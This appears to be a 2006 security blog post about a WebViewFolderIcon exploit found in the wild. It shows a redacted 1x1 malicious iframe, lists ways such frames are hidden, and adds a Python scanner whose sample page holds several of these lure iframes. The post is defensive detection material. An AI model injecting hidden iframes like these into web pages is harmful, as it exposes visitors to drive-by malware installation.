Saturday, September 30, 2006

WebViewFolderIcon setSlice exploit in the wild - follow up

Hi folks,

We've now verified that this works pretty well on fully patched XP SP2 (yes, including the VML patch). It installs at least a rootkit, so I'm not going to share the exact URL, but it's along the lines of http://xxxxxxxxxx.biz/dl/slide499.html.

The fact that I only found it on one web site so far is immaterial .... these guys have a well established distribution model, with many adult/ warez sites acting as lures, and it is probably on many more already.

They also like to hack into completely innocent sites and insert an iframe, turning them into unwitting lures, and they look for bulletin boards that are open enough to let them post their iframe.

I had a question off-blog about what a malicious iframe looks like .... it typically looks something like this...

<iframe src="http://xxxxxxxxx.com/get_st.php?xxxxxxx" width=1 height=1></iframe>

The important thing to notice is that width and height are both set to 1 pixel. The browser still fetches the framed page and runs whatever script it contains exactly as it would for a full-size frame; the frame is simply too small to see. The same effect can be had with an inline style such as display:none or visibility:hidden, or by positioning the frame far off-screen, so a check that looks only at width and height will miss some of these.
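As an added example (not code from the original post or from SocketShield), here is a small scanner that walks a page's HTML and flags iframes that would be invisible to the user: the 1x1 trick shown above, plus the display:none, visibility:hidden, hidden-attribute and off-screen-positioning variants. The sample HTML, the extra get_st.php query strings, the 2-pixel threshold and the -1000px off-screen cutoff are all constructed for the example.

```python
"""Flag hidden iframes of the kind used to turn an innocent page into a lure.

Added example, not the original post's code. Finds <iframe> tags whose
width/height are tiny (the 1x1 trick), whose inline style hides them, or
which carry the HTML hidden attribute.
"""
import re
from html.parser import HTMLParser

# Assumption for this example: an edge of 2px or less is invisible in practice.
MAX_INVISIBLE_PX = 2
# Assumption: an absolute offset this far off-screen is never a legitimate layout.
OFFSCREEN_PX = -1000


def _px(value):
    """Parse '1', '1px', ' 0 ' into an int; return None for '100%' or missing."""
    if value is None:
        return None
    m = re.match(r"\s*(-?\d+)\s*(px)?\s*$", value, re.I)
    return int(m.group(1)) if m else None


def _hidden_by_style(style):
    """Return a reason string if the inline style hides the element, else None."""
    if not style:
        return None
    s = style.lower()
    if re.search(r"display\s*:\s*none", s):
        return "style display:none"
    if re.search(r"visibility\s*:\s*hidden", s):
        return "style visibility:hidden"
    # position:absolute plus a large negative left/top pushes the frame off-screen
    if re.search(r"position\s*:\s*absolute", s):
        for prop in ("left", "top"):
            m = re.search(prop + r"\s*:\s*(-\d+)\s*px", s)
            if m and int(m.group(1)) <= OFFSCREEN_PX:
                return "positioned off-screen"
    # width:1px / height:1px in the style attribute instead of HTML attributes
    for m in re.finditer(r"\b(width|height)\s*:\s*(\d+)\s*px", s):
        if int(m.group(2)) <= MAX_INVISIBLE_PX:
            return f"style {m.group(1)}:{m.group(2)}px"
    return None


class _IframeCollector(HTMLParser):
    """HTMLParser lowercases tag and attribute names and handles unquoted values."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # a valueless attribute such as 'hidden' maps to None
        reasons = []
        for dim in ("width", "height"):
            n = _px(a.get(dim))
            if n is not None and n <= MAX_INVISIBLE_PX:
                reasons.append(f"{dim}={n}")
        if "hidden" in a:
            reasons.append("hidden attribute")
        style_reason = _hidden_by_style(a.get("style"))
        if style_reason:
            reasons.append(style_reason)
        if reasons:
            # getpos() gives the (line, column) where this start tag began
            self.findings.append({"src": a.get("src"), "reasons": reasons,
                                  "line": self.getpos()[0]})


def find_hidden_iframes(html):
    """Return a list of {'src', 'reasons', 'line'} dicts for suspicious iframes."""
    p = _IframeCollector()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page: one legitimate frame and three hidden ones.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://xxxxxxxxx.com/get_st.php?xxxxxxx" width=1 height=1></iframe>
<iframe src="https://example.invalid/legit" width="600" height="400"></iframe>
<iframe src="http://xxxxxxxxx.com/get_st.php?b" style="display:none"></iframe>
<IFRAME SRC="http://xxxxxxxxx.com/get_st.php?c" STYLE="position:absolute;left:-5000px;top:0"></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f"line {f['line']}: {f['src']} ({', '.join(f['reasons'])})")
```

Run it against a saved copy of a page you suspect has been tampered with; anything it reports is worth pulling down in a sandbox. It is a coarse filter, not a verdict: tracking pixels and some ad frames are legitimately 1x1, and an attacker can always hide a frame in a way this does not recognise, so treat a hit as a lead rather than proof.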

The exploit is very easy to copy, so I expect this will be widely adopted.

Naturally, SocketShield protects against it.

Roger
